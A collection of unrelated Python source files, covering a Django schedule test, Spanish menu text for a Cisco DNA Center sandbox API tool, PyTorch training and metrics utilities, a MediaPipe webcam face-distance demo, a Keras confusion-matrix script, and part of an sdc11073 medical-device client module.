abstract=ABSTRACT_CONTENT, speaker=speaker, proposal_base=proposal_base, section=section, ) slot = SlotFactory() slot.assign(presentation) response = self.client.get(reverse("schedule_json")) self.assertContains(response=response, text=TALK_TITLE) self.assertContains(response=response, text=DESCRIPTION_CONTENT) self.assertContains(response=response, text=ABSTRACT_CONTENT) enauto/enauto_gui_dnac_menus_ebo.py #--------------------DNAC MENUS NIVEL 1----------------------------- DNAC_L1_MENU="""Estás usando DNA CENTER SANDBOX ALWAYS ON 1) SANDBOX DNAC2 (https://sandboxdnac2.cisco.com) "USER ESTE MEJOR" 2) SANDBOX DNAC (https://sandboxdnac.cisco.com) "ESTÁ MIGRANDO AL 2" ¿Que opción deseas usar?""" #--------------------DNAC MENUS NIVEL 2----------------------------- DNAC_L2_MENU="""Estás usando DNA CENTER SANDBOX ALWAYS ON 1) POST FOR AUTHENTICATION (POST /system/api/v1/auth/token) 2) SITE MENU 3) TOPOLOGY MENU 4) DEVICES MENU 5) CLIENTS MENU 6) CONFIG TEMPLATES MENU 7) COMMAND RUNNER MENU 8) NETWORK DISCOVERY MENU 9) PATH TRACE MENU A) TASK MENU B) FILE MENU C) EVENT MENU ¿Que opción deseas usar?""" #--------------------DNAC MENUS NIVEL 3 ----------------------------- DNAC_SITE_MENU="""Estás usando SITE API 1) GET SITE (GET /intent/api/v1/site) 2) GET SITE HEALTH (GET /intent/api/v1/site-health?timestamp="1612209600000") ¿Que opción deseas usar?""" DNAC_TOPOLOGY_MENU="""Estás usando TOPOLOGY API 1) GET FOR PHYSICAL TOPOLOGY (GET /intent/api/v1/topology/physical-topology) 2) GET FOR SITE TOPOLOGY (GET /intent/api/v1/topology/site-topology) ¿Que opción deseas usar?""" DNAC_DEVICES_MENU="""Estás usando DEVICE API 1) GET FOR NETWORK DEVICES (GET 
/intent/api/v1/network-device) 2) GET FOR INTERFACES (GET /intent/api/v1/interface) ¿Que opción deseas usar?""" DNAC_CLIENTS_MENU="""Estás usando CLIENTS API 1) GET CLIENTS HEALTH (GET /intent/api/v1/client-health?timestamp="1612209600000") 2) GET CLIENT ENRICHMENT DETAILS (GET /dna/intent/api/v1/client-enrichment-details) (se requiere una mac, pero no hay usuarios) 3) GET ISSUES ENRICHMENT DETAILS (GET /dna/intent/api/v1/issue-enrichment-details) (se requiere una mac, pero no hay usuarios) ¿Que opción deseas usar?""" DNAC_CONFIG_TEMPLATES_MENU="""Estás usando COMMAND RUNNER API 1) GET FOR PROJECT LIST (GET /intent/api/v1/template-programmer/project) 2) GET FOR TEMPLATE LIST (GET /intent/api/v1/template-programmer/template) 3) GET FOR TEMPLATE DETAILS (GET /intent/api/v1/template-programmer/template/{templateId}) 4) POST FOR A NEW TEMPLATE (POST /intent/api/v1/template-programmer/project/{projectId}/template) (FALTA DISEÑAR EL BODY) 5) DEPLOY FOR A TEMPLATE (POST /intent/api/v1/template-programmer/template/deploy) (BAD REQUEST) 6) GET FOR TEMPLATE DEPLOY STATUS (GET /v1/template-programmer/template/deploy/status/deploymentId) (FALTA EL ANTERIOR) ¿Que opción deseas usar?""" DNAC_COMMAND_RUNNER_MENU="""Estás usando COMMAND RUNNER API 1) GET FOR LEGIT READS (GET /intent/api/v1/network-device-poller/cli/legit-reads) 2) POST FOR COMMAND (POST /intent/api/v1/network-device-poller/cli/read-request) ¿Que opción deseas usar?""" DNAC_NETWORK_DISCOVERY_MENU="""Estás usando NETWORK DISCOVERY API 1) GET FOR DISCOVERY COUNTS (GET /intent/api/v1/discovery/count) 2) GET FOR DISCOVERY LIST (GET /intent/api/v1/discovery/1/"+str(count)) 3) GET FOR DISCOVERY SUMMARY (GET /intent/api/v1/discovery/3206/summary) ¿Que opción deseas usar?""" DNAC_PATH_TRACE_MENU="""Estás usando PATH TRACE API 1) POST FOR PATH TRACE (POST /intent/api/v1/flow-analysis) 2) GET FOR FLOW ANALYSIS (GET /intent/api/v1/flow-analysis) (ALGO PASA CON ESTE GET) 3) GET FOR FLOW ANALYSIS WITH ID (GET /intent/api/v1/flow-analysis/{flowAnalysisId}) 4) DELETE FOR FLOW ANALYSIS WITH ID (DELETE /intent/api/v1/flow-analysis/{flowAnalysisId} ¿Que opción deseas usar?""" DNAC_TASK_MENU="""Estás usando TASK API 1) GET FOR TASK LIST (GET /intent/api/v1/task) 2) GET FOR TASK BY ID (GET /intent/api/v1/task/taskId) ¿Que opción deseas usar?""" DNAC_FILE_MENU="""Estás usando FILE API 1) GET FOR NAMESPACE LIST (GET /intent/api/v1/namespace) 2) GET FOR FILES BY NAMESPACE (GET /intent/api/v1/namespace/nameSpace) 3) GET FOR FILE BY FILE ID (GET /intent/api/v1/files/fileId) ¿Que opción deseas usar?""" DNAC_EVENT_MENU="""Estás usando EVENT API 1) GET FOR EVENTS (GET /intent/api/v1/events?tags=ASSURANCE) 2) GET FOR EVENT SUBSCRIPTION (GET /intent/api/v1/event/subscription) 3) GET FOR EVENT NOTIFICATIONS (GET /intent/api/v1/event/event-series (NO HAY NOTIFICACIONES) 4) POST FOR EVENT SUBSCRIPTION (POST /intent/api/v1/event/subscription) (NO HAY PERMISO) ¿Que opción deseas usar?"""import torch import numpy as np import pickle import os from datetime import datetime import glob import re import matplotlib.pyplot as plt plt.switch_backend('agg') from collections import deque from tqdm import tqdm from torchvision import transforms import sys ap_impl_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../CATER-SSL/external_lib/average-precision/python/') # noQA sys.path.insert(0, ap_impl_path) from ap import compute_multiple_aps class HiddenPrints: def __enter__(self): self._original_stdout = sys.stdout sys.stdout = open(os.devnull, 'w') def 
__exit__(self, exc_type, exc_val, exc_tb): sys.stdout.close() sys.stdout = self._original_stdout def blockPrint(func): def func_wrapper(*args, **kwargs): with HiddenPrints(): value = func(*args, **kwargs) return value return func_wrapper def save_checkpoint(state, is_best=0, gap=1, filename='models/checkpoint.pth.tar', keep_all=False): torch.save(state, filename) last_epoch_path = os.path.join(os.path.dirname(filename), 'epoch%s.pth.tar' % str(state['epoch']-gap)) if not keep_all: try: os.remove(last_epoch_path) except: pass if is_best: past_best = glob.glob(os.path.join(os.path.dirname(filename), 'model_best_*.pth.tar')) for i in past_best: try: os.remove(i) except: pass torch.save(state, os.path.join(os.path.dirname(filename), 'model_best_epoch%s.pth.tar' % str(state['epoch']))) def write_log(content, epoch, filename): if not os.path.exists(filename): log_file = open(filename, 'w') else: log_file = open(filename, 'a') log_file.write('## Epoch %d:\n' % epoch) log_file.write('time: %s\n' % str(datetime.now())) log_file.write(content + '\n\n') log_file.close() class Logger(object): '''write something to txt file''' def __init__(self, path): self.birth_time = datetime.now() filepath = os.path.join(path, self.birth_time.strftime('%Y-%m-%d-%H:%M:%S')+'.log') self.filepath = filepath with open(filepath, 'a') as f: f.write(self.birth_time.strftime('%Y-%m-%d %H:%M:%S')+'\n') def log(self, string): with open(self.filepath, 'a') as f: time_stamp = datetime.now() - self.birth_time f.write(strfdelta(time_stamp,"{d}-{h:02d}:{m:02d}:{s:02d}")+'\t'+string+'\n') def calc_topk_accuracy(output, target, topk=(1,)): ''' Modified from: https://gist.github.com/agermanidis/275b23ad7a10ee89adccf021536bb97e Given predicted and ground truth labels, calculate top-k accuracies. 
''' if len(target.shape) > 1 and target.shape[1] != 1: return compute_map(target.detach().cpu(), torch.sigmoid(output).detach().cpu()) maxk = max(topk) batch_size = target.size(0) _, pred = output.topk(maxk, 1, True, True) pred = pred.t() correct = pred.eq(target.view(1, -1).expand_as(pred)).contiguous() res = [] for k in topk: correct_k = correct[:k].view(-1).float().sum(0) res.append(correct_k.mul_(1 / batch_size)) return res @blockPrint def compute_map(labels, preds): ap = compute_multiple_aps(labels, preds) map = np.mean([el for el in ap if el >= 0]) return map def calc_accuracy(output, target): '''output: (B, N); target: (B)''' if len(target.shape) == 1 or target.shape[1] == 1: target = target.squeeze() _, pred = torch.max(output, 1) return torch.mean((pred == target).float()) else: output = torch.sigmoid(output) print(torch.mean((((output > 0.5).float() - (target > 0.5).float())[target > 0.5]).float())) #return torch.mean((((output > 0.5).float() - (target > 0.5).float()).sum(1) == 0).float()) mAP = compute_map(target.detach().cpu(), output.detach().cpu()) return torch.FloatTensor([mAP]) def denorm(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]): assert len(mean)==len(std)==3 inv_mean = [-mean[i]/std[i] for i in range(3)] inv_std = [1/i for i in std] return transforms.Normalize(mean=inv_mean, std=inv_std) def neq_load_customized(model, pretrained_dict): ''' load pre-trained model in a not-equal way, when new model has been partially modified ''' model_dict = model.state_dict() tmp = {} print('\n=======Check Weights Loading======') print('Weights not used from pretrained file:') for k, v in pretrained_dict.items(): if k in model_dict: tmp[k] = v else: print(k) print('---------------------------') print('Weights not loaded into new model:') for k, v in model_dict.items(): if k not in pretrained_dict: print(k) print('===================================\n') # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} del pretrained_dict model_dict.update(tmp) del tmp model.load_state_dict(model_dict) return model class AverageMeter(object): """Computes and stores the average and current value""" def __init__(self): self.reset() def reset(self): self.val = 0 self.avg = 0 self.sum = 0 self.count = 0 self.local_history = deque([]) self.local_avg = 0 self.history = [] self.dict = {} # save all data values here self.save_dict = {} # save mean and std here, for summary table def update(self, val, n=1, history=0, step=5): self.val = val self.sum += val * n self.count += n self.avg = self.sum / self.count if history: self.history.append(val) if step > 0: self.local_history.append(val) if len(self.local_history) > step: self.local_history.popleft() self.local_avg = np.average(self.local_history) def dict_update(self, val, key): if key in self.dict.keys(): self.dict[key].append(val) else: self.dict[key] = [val] def __len__(self): return self.count class AccuracyTable(object): '''compute accuracy for each class''' def __init__(self): self.dict = {} def update(self, pred, tar): pred = torch.squeeze(pred) tar = torch.squeeze(tar) for i, j in zip(pred, tar): i = int(i) j = int(j) if j not in self.dict.keys(): self.dict[j] = {'count':0,'correct':0} self.dict[j]['count'] += 1 if i == j: self.dict[j]['correct'] += 1 def print_table(self, label): for key in self.dict.keys(): acc = self.dict[key]['correct'] / self.dict[key]['count'] print('%s: %2d, accuracy: %3d/%3d = %0.6f' \ % (label, key, self.dict[key]['correct'], self.dict[key]['count'], acc)) class ConfusionMeter(object): 
'''compute and show confusion matrix''' def __init__(self, num_class): self.num_class = num_class self.mat = np.zeros((num_class, num_class)) self.precision = [] self.recall = [] def update(self, pred, tar): pred, tar = pred.cpu().numpy(), tar.cpu().numpy() pred = np.squeeze(pred) tar = np.squeeze(tar) for p,t in zip(pred.flat, tar.flat): self.mat[p][t] += 1 def print_mat(self): print('Confusion Matrix: (target in columns)') print(self.mat) def plot_mat(self, path, dictionary=None, annotate=False): plt.figure(dpi=600) plt.imshow(self.mat, cmap=plt.cm.jet, interpolation=None, extent=(0.5, np.shape(self.mat)[0]+0.5, np.shape(self.mat)[1]+0.5, 0.5)) width, height = self.mat.shape if annotate: for x in range(width): for y in range(height): plt.annotate(str(int(self.mat[x][y])), xy=(y+1, x+1), horizontalalignment='center', verticalalignment='center', fontsize=8) if dictionary is not None: plt.xticks([i+1 for i in range(width)], [dictionary[i] for i in range(width)], rotation='vertical') plt.yticks([i+1 for i in range(height)], [dictionary[i] for i in range(height)]) plt.xlabel('Ground Truth') plt.ylabel('Prediction') plt.colorbar() plt.tight_layout() plt.savefig(path, format='svg') plt.clf() for i in range(width): if np.sum(self.mat[i,:]) != 0: self.precision.append(self.mat[i,i] / np.sum(self.mat[i,:])) if np.sum(self.mat[:,i]) != 0: self.recall.append(self.mat[i,i] / np.sum(self.mat[:,i])) print('Average Precision: %0.4f' % np.mean(self.precision)) print('Average Recall: %0.4f' % np.mean(self.recall)) def MultiStepLR_Restart_Multiplier(epoch, gamma=0.1, step=[10,15,20], repeat=3): '''return the multipier for LambdaLR, 0 <= ep < 10: gamma^0 10 <= ep < 15: gamma^1 15 <= ep < 20: gamma^2 20 <= ep < 30: gamma^0 ... repeat 3 cycles and then keep gamma^2''' max_step = max(step) effective_epoch = epoch % max_step if epoch // max_step >= repeat: exp = len(step) - 1 else: exp = len([i for i in step if effective_epoch>=i]) return gamma ** exp def strfdelta(tdelta, fmt): d = {"d": tdelta.days} d["h"], rem = divmod(tdelta.seconds, 3600) d["m"], d["s"] = divmod(rem, 60) return fmt.format(**d) class Logger(object): '''write something to txt file''' def __init__(self, path): self.birth_time = datetime.now() filepath = os.path.join(path, self.birth_time.strftime('%Y-%m-%d-%H:%M:%S')+'.log') self.filepath = filepath with open(filepath, 'a') as f: f.write(self.birth_time.strftime('%Y-%m-%d %H:%M:%S')+'\n') def log(self, string): with open(self.filepath, 'a') as f: time_stamp = datetime.now() - self.birth_time f.write(strfdelta(time_stamp,"{d}-{h:02d}:{m:02d}:{s:02d}")+'\t'+string+'\n') lib/trainer.py import os import time import glob import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from .utils import get_latest_file, iterate_minibatches, check_numpy, process_in_chunks from .nn_utils import to_one_hot from collections import OrderedDict from copy import deepcopy from tensorboardX import SummaryWriter from apex import amp import json from os.path import join as pjoin, exists as pexists import argparse from torch.optim.lr_scheduler import CosineAnnealingWarmRestarts from sklearn.metrics import roc_auc_score, log_loss from . 
import nn_utils, arch class Trainer(nn.Module): def __init__(self, model, experiment_name=None, warm_start=False, Optimizer=torch.optim.Adam, optimizer_params={}, lr=0.01, lr_warmup_steps=-1, verbose=False, n_last_checkpoints=1, step_callbacks=[], fp16=0, problem='classification', pretraining_ratio=0.15, masks_noise=0.1, opt_only_last_layer=False, freeze_steps=0, **kwargs): """ :type model: torch.nn.Module :param experiment_name: a path where all logs and checkpoints are saved :param warm_start: when set to True, loads last checpoint :param Optimizer: function(parameters) -> optimizer :param verbose: when set to True, produces logging information :param problem : str Problem type. Chosen from ['classification', 'regression', 'pretrain'] :param pretraining_ratio : float Between 0 and 1, percentage of feature to mask for reconstruction. Only used when problem == 'pretrain' """ super().__init__() self.model = model self.verbose = verbose self.lr = lr self.lr_warmup_steps = lr_warmup_steps # When using fp16, there are some params if not filtered out by requires_grad # will produce error params = [p for p in self.model.parameters() if p.requires_grad] if opt_only_last_layer: print('Only optimize last layer!') params = [self.model.last_w] self.opt = Optimizer(params, lr=lr, **optimizer_params) self.step = 0 self.n_last_checkpoints = n_last_checkpoints self.step_callbacks = step_callbacks self.fp16 = fp16 self.problem = problem self.pretraining_ratio = pretraining_ratio self.masks_noise = masks_noise self.opt_only_last_layer = opt_only_last_layer self.freeze_steps = freeze_steps if problem.startswith('pretrain'): # Don't do freeze when pretraining self.freeze_steps = 0 if problem == 'classification': # In my datasets I only have binary classification self.loss_function = \ (lambda x, y: F.binary_cross_entropy_with_logits(x, y.float())) elif problem == 'regression': self.loss_function = F.mse_loss elif problem.startswith('pretrain'): # Not used self.loss_function = None else: raise NotImplementedError() if experiment_name is None: experiment_name = 'untitled_{}.{:0>2d}.{:0>2d}_{:0>2d}:{:0>2d}'.format(*time.gmtime()[:5]) if self.verbose: print('using automatic experiment name: ' + experiment_name) self.experiment_path = pjoin('logs/', experiment_name) # if not warm_start and experiment_name != 'debug': # assert not os.path.exists(self.experiment_path), 'experiment {} already exists'.format(experiment_name) # self.writer = SummaryWriter(self.experiment_path, comment=experiment_name) if fp16: self.model, self.opt = amp.initialize( self.model, self.opt, opt_level='O1') if warm_start: self.load_checkpoint() def save_checkpoint(self, tag=None, path=None, mkdir=True, **kwargs): assert tag is None or path is None, "please provide either tag or path or nothing, not both" if tag is None and path is None: tag = "temp_{}".format(self.step) if path is None: path = pjoin(self.experiment_path, "checkpoint_{}.pth".format(tag)) if mkdir: os.makedirs(os.path.dirname(path), exist_ok=True) # Sometimes happen there is a checkpoint already existing. Then overwrite! 
if pexists(path): os.remove(path) torch.save(OrderedDict([ ('model', self.model.state_dict(**kwargs)), ('opt', self.opt.state_dict()), ('step', self.step), ] + ([] if not self.fp16 else [('amp', amp.state_dict())])), path) if self.verbose: print("Saved " + path) return path def load_checkpoint(self, tag=None, path=None, **kwargs): assert tag is None or path is None, "please provide either tag or path or nothing, not both" if tag is None and path is None: path = self.get_latest_file(pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth')) if path is None: return self elif tag is not None and path is None: path = pjoin(self.experiment_path, "checkpoint_{}.pth".format(tag)) checkpoint = torch.load(path) self.model.load_state_dict(checkpoint['model'], **kwargs) self.opt.load_state_dict(checkpoint['opt']) self.step = int(checkpoint['step']) if self.fp16 and 'amp' in checkpoint: amp.load_state_dict(checkpoint['amp']) # Set the temperature for c in self.step_callbacks: c(self.step) if self.verbose: print('Loaded ' + path) return self def get_latest_file(self, pattern): path = get_latest_file(pattern) if path is None: return None # File not saved correctly if os.stat(path).st_size == 0 \ or len(glob.glob(pattern)) > self.n_last_checkpoints: os.remove(path) path = self.get_latest_file(pattern) return path def average_checkpoints(self, tags=None, paths=None, out_tag='avg', out_path=None): assert tags is None or paths is None, "please provide either tags or paths or nothing, not both" assert out_tag is not None or out_path is not None, "please provide either out_tag or out_path or both, not nothing" if tags is None and paths is None: paths = self.get_latest_checkpoints( pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth'), self.n_last_checkpoints) elif tags is not None and paths is None: paths = [pjoin(self.experiment_path, 'checkpoint_{}.pth'.format(tag)) for tag in tags] checkpoints = [torch.load(path) for path in paths] averaged_ckpt = deepcopy(checkpoints[0]) for key in averaged_ckpt['model']: values = [ckpt['model'][key] for ckpt in checkpoints] averaged_ckpt['model'][key] = sum(values) / len(values) if out_path is None: out_path = pjoin(self.experiment_path, 'checkpoint_{}.pth'.format(out_tag)) torch.save(averaged_ckpt, out_path) def get_latest_checkpoints(self, pattern, n_last=None): list_of_files = glob.glob(pattern) if len(list_of_files) == 0: return [] assert len(list_of_files) > 0, "No files found: " + pattern return sorted(list_of_files, key=os.path.getctime, reverse=True)[:n_last] def remove_old_temp_checkpoints(self, number_ckpts_to_keep=None): if number_ckpts_to_keep is None: number_ckpts_to_keep = self.n_last_checkpoints paths = self.get_latest_checkpoints(pjoin(self.experiment_path, 'checkpoint_temp_[0-9]*.pth')) paths_to_delete = paths[number_ckpts_to_keep:] for ckpt in paths_to_delete: os.remove(ckpt) def train_on_batch(self, *batch, device, update=True): # Tune temperature in choice function for c in self.step_callbacks: c(self.step) # Tune the learning rate if self.lr_warmup_steps > 0 and self.step < self.lr_warmup_steps: cur_lr = self.lr * (self.step + 1) / self.lr_warmup_steps self.set_lr(cur_lr) if self.freeze_steps > 0 and self.step == 0 and update: self.model.freeze_all_but_lastw() if 0 < self.freeze_steps == self.step: self.model.unfreeze() x_batch, y_batch = batch x_batch = torch.as_tensor(x_batch, device=device) if not self.problem.startswith('pretrain'): # Save some memory y_batch = torch.as_tensor(y_batch, device=device) self.model.train() # Read that it's 
faster... for group in self.opt.param_groups: for p in group['params']: p.grad = None # self.opt.zero_grad() if not self.problem.startswith('pretrain'): # Normal training logits, penalty = self.model(x_batch, return_outputs_penalty=True) loss = self.loss_function(logits, y_batch).mean() else: x_masked, masks, masks_noise = self.mask_input(x_batch) feature_masks = masks_noise if self.problem == 'pretrain_recon2' else None outputs, penalty = self.model(x_masked, return_outputs_penalty=True, feature_masks=feature_masks) loss = self.pretrain_loss(outputs, masks, x_batch) loss += penalty if self.fp16: with amp.scale_loss(loss, self.opt) as scaled_loss: scaled_loss.backward() else: loss.backward() if update: self.opt.step() self.step += 1 # self.writer.add_scalar('train loss', loss.item(), self.step) return {'loss': loss.item()} def mask_input(self, x_batch): masks = torch.bernoulli( self.pretraining_ratio * torch.ones(x_batch.shape) ).to(x_batch.device) infills = 0. # if self.problem == 'pretrain_mask': # # Use marginal dist (Gaussian) to in-fill. # infills = torch.normal(0, 1, size=masks.shape).to(x_batch.device) # To make it more difficult, 10% of the time we do not mask the inputs! # Similar to BERT tricks. new_masks = masks if self.masks_noise > 0.: new_masks = torch.bernoulli((1. - self.masks_noise) * masks) x_batch = (1. - new_masks) * x_batch + new_masks * infills return x_batch, masks, new_masks def pretrain_loss(self, outputs, masks, targets): if self.problem.startswith('pretrain_recon'): nb_masks = torch.sum(masks, dim=1, keepdim=True) nb_masks[nb_masks == 0] = 1 loss = (((outputs - targets) * masks) ** 2) / nb_masks loss = torch.mean(loss) # elif self.problem == 'pretrain_mask': # # BCE loss to predict if that token is the mask. And set target as 0.9 # loss = F.binary_cross_entropy_with_logits( # outputs, (1. - self.masks_noise) * masks) else: raise NotImplementedError('Unknown problem: ' + self.problem) return loss def evaluate_pretrain_loss(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) self.model.train(False) with torch.no_grad(): if self.problem.startswith('pretrain_recon'): # no mask outputs = process_in_chunks(self.model, X_test, batch_size=batch_size) loss = (((outputs - X_test)) ** 2) loss = torch.mean(loss) # elif self.problem == 'pretrain_mask': # X_masked, masks, _ = self.mask_input(X_test) # outputs = process_in_chunks(self.model, X_masked, batch_size=batch_size) # loss = self.pretrain_loss(outputs, masks, X_test) else: raise NotImplementedError('Unknown problem: ' + self.problem) return loss.item() def evaluate_classification_error(self, X_test, y_test, device, batch_size=4096): ''' This is for evaluation of binary error ''' X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = process_in_chunks(self.model, X_test, batch_size=batch_size) logits = check_numpy(logits) error_rate = (y_test != (logits >= 0)).mean() # error_rate = (y_test != np.argmax(logits, axis=1)).mean() return error_rate def evaluate_negative_auc(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = process_in_chunks(self.model, X_test, batch_size=batch_size) logits = check_numpy(logits) # assert logits.shape[1] == 2, 'logits shape is not binary! 
%d' % logits.shape[1] # logit_diff = logits[:, 1] - logits[:, 0] auc = roc_auc_score(y_test, logits) return -auc def evaluate_mse(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): prediction = process_in_chunks(self.model, X_test, batch_size=batch_size) prediction = check_numpy(prediction) error_rate = ((y_test - prediction) ** 2).mean() error_rate = float(error_rate) # To avoid annoying JSON unserializable bug return error_rate def evaluate_multiple_mse(self, X_test, y_test, device, batch_size=4096): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): prediction = process_in_chunks(self.model, X_test, batch_size=batch_size) prediction = check_numpy(prediction) error_rate = ((y_test - prediction) ** 2).mean(axis=0) return error_rate.astype(float).tolist() def evaluate_logloss(self, X_test, y_test, device, batch_size=512): X_test = torch.as_tensor(X_test, device=device) y_test = check_numpy(y_test) self.model.train(False) with torch.no_grad(): logits = F.softmax(process_in_chunks(self.model, X_test, batch_size=batch_size), dim=1) logits = check_numpy(logits) y_test = torch.tensor(y_test) logloss = log_loss(check_numpy(to_one_hot(y_test)), logits) logloss = float(logloss) # To avoid annoying JSON unserializable bug return logloss def decrease_lr(self, ratio=0.1, min_lr=1e-6): if self.lr <= min_lr: return self.lr *= ratio if self.lr < min_lr: self.lr = min_lr self.set_lr(self.lr) def set_lr(self, lr): for g in self.opt.param_groups: g['lr'] = lr # exemple print ("hello revision python")# %% # live demo import cv2 import mediapipe as mp import utilities mp_drawing = mp.solutions.drawing_utils mp_face_mesh = mp.solutions.face_mesh # For webcam input: drawing_spec = mp_drawing.DrawingSpec(thickness=1, circle_radius=1) cap = cv2.VideoCapture(0) with mp_face_mesh.FaceMesh( min_detection_confidence=0.5, min_tracking_confidence=0.5 ) as face_mesh: while cap.isOpened(): success, image = cap.read() if not success: print("Ignoring empty camera frame.") # If loading a video, use 'break' instead of 'continue'. continue # Flip the image horizontally for a later selfie-view display, and convert # the BGR image to RGB. image = cv2.cvtColor(cv2.flip(image, 1), cv2.COLOR_BGR2RGB) # To improve performance, optionally mark the image as not writeable to # pass by reference. image.flags.writeable = False results = face_mesh.process(image) # Draw the face mesh annotations on the image. 
image.flags.writeable = True image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) if results.multi_face_landmarks: landmarks = utilities.get_avg_landmarks_from_results( results, utilities.UNIQUE_EYE_COORDINATES ) image = utilities.add_landmarks_to_image(image, landmarks) distance = utilities.get_eye_distance(landmarks) image = utilities.add_distance_to_image(image, distance) cv2.imshow("Face distance", image) if cv2.waitKey(5) & 0xFF == 27: break results = face_mesh.process(image) cap.release() #!/usr/bin/env python import numpy as np import matplotlib.pyplot as plt import json import os import yaml FOLD = 0 config = yaml.load(open( "~/Machine-Learning/config/MSSM_HWW.yaml", "r")) # load testing data x_test = np.load( '~/Machine-Learning/arrays/x_test_fold{}.npy'.format(FOLD)) y_test = np.load( '~/Machine-Learning/arrays/y_test_fold{}.npy'.format(FOLD)) # load model from keras.models import load_model model = load_model( '~/Machine-Learning/fold{}_multiclass_model.h5'.format(FOLD)) # preprocessing from sklearn import preprocessing scaler = preprocessing.StandardScaler().fit(x_test) x_test_scaled = scaler.transform(x_test) # predicted probabilities for the test set Yp = model.predict(x_test_scaled, verbose=1) # to label yp = np.argmax(Yp, axis=-1) y_test = np.argmax(y_test, axis=-1) import itertools from sklearn.metrics import confusion_matrix def plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.viridis): """ This function prints and plots the confusion matrix. Normalization can be applied by setting `normalize=True`. """ if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis] print("Normalized confusion matrix") else: print('Confusion matrix, without normalization') print(cm) plt.imshow(cm, interpolation='nearest', cmap=cmap) plt.title(title) plt.colorbar() tick_marks = np.arange(len(classes)) plt.xticks(tick_marks, classes, rotation=45) plt.yticks(tick_marks, classes) fmt = '.2f' if normalize else 'd' thresh = cm.max() / 2. for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])): plt.text(j, i, format(cm[i, j], fmt), horizontalalignment="center", color="white" if cm[i, j] > thresh else "black") plt.tight_layout() plt.ylabel('True label') plt.xlabel('Predicted label') # Compute confusion matrix cnf_matrix = confusion_matrix(y_test, yp) np.set_printoptions(precision=2) # Plot non-normalized confusion matrix plt.figure() plot_confusion_matrix(cnf_matrix, classes=config["classes"], title='Confusion matrix, without normalization') # Plot normalized confusion matrix plt.figure() plot_confusion_matrix(cnf_matrix, classes=config["classes"], normalize=True, title='Normalized confusion matrix') plt.show() deichmab-draeger/sdc11073-1 import traceback import time from threading import Lock from collections import deque from collections import namedtuple from statistics import mean, stdev import copy from lxml import etree as etree_ from .. import observableproperties as properties from . import mdibbase from . import msgreader from .. import namespaces from .. import pmtypes from concurrent import futures from .. 
import loghelper _global_nsmap = namespaces.nsmap PROFILING = False if PROFILING: import cProfile import pstats from io import StringIO LOG_WF_AGE_INTERVAL = 30 # how often a log message is written with mean and stdef of waveforms age AGE_CALC_SAMPLES_COUNT = 100 # amount of data for wf mean age and stdev calculation A_NO_LOG = 0 A_OUT_OF_RANGE = 1 A_STILL_OUT_OF_RANGE = 2 A_BACK_IN_RANGE = 3 class DeterminationTimeWarner: """A Helper to reduce log warnings regarding determination time.""" ST_IN_RANGE = 0 ST_OUT_OF_RANGE = 1 result_lookup = { # (last, current) : (action, shall_repeat) (ST_IN_RANGE, ST_IN_RANGE): (A_NO_LOG, False), (ST_IN_RANGE, ST_OUT_OF_RANGE): (A_OUT_OF_RANGE, False), (ST_OUT_OF_RANGE, ST_OUT_OF_RANGE): (A_STILL_OUT_OF_RANGE, True), (ST_OUT_OF_RANGE, ST_IN_RANGE): (A_BACK_IN_RANGE, False) } def __init__(self, repeat_period=30): self.repeat_period = repeat_period self._last_log_time = 0 self.last_state = self.ST_IN_RANGE def getOutOfDeterminationTimeLogState(self, minAge, maxAge, warn_limit): ''' @return: one of above constants ''' now = time.time() if minAge < -warn_limit or maxAge > warn_limit: current_state = self.ST_OUT_OF_RANGE else: current_state = self.ST_IN_RANGE action, shall_repeat = self.result_lookup[(self.last_state, current_state)] if self.last_state != current_state: # a state transition self.last_state = current_state self._last_log_time = now return action else: # no state transition, but might need repeated logging if shall_repeat and now - self._last_log_time >= self.repeat_period: self._last_log_time = now return action else: return A_NO_LOG _AgeData = namedtuple('_AgeData', 'mean_age stdev min_age max_age') class ClientRtBuffer(object): '''Collects data of one real time stream.''' def __init__(self, sample_period, max_samples): ''' @param sample_period: float value, in seconds. When an incoming real time sample array is split into single RtSampleContainers, this is used to calculate the individual time stamps. Value can be zero if correct value is not known. In this case all Containers will have the observation time of the sample array. @param max_samples: integer, max. length of self.rtdata ''' self.rt_data = deque(maxlen=max_samples) self.sample_period = sample_period self._max_samples = max_samples self._logger = loghelper.getLoggerAdapter('sdc.client.mdib.rt') self._lock = Lock() self.last_sc = None # last statecontainer that was handled self._age_of_data_list = deque(maxlen=AGE_CALC_SAMPLES_COUNT) # used to calculate average age of samples when received self._reported_min_age = None self._reported_max_age = None def mkRtSampleContainers(self, realtimeSampleArrayContainer): ''' :param realtimeSampleArrayContainer: a RealTimeSampleArrayMetricStateContainer instance :return: a list of mdibbase.RtSampleContainer ''' self.last_sc = realtimeSampleArrayContainer metricValue = realtimeSampleArrayContainer.metricValue if metricValue is None: # this can happen if metric state is not activated. 
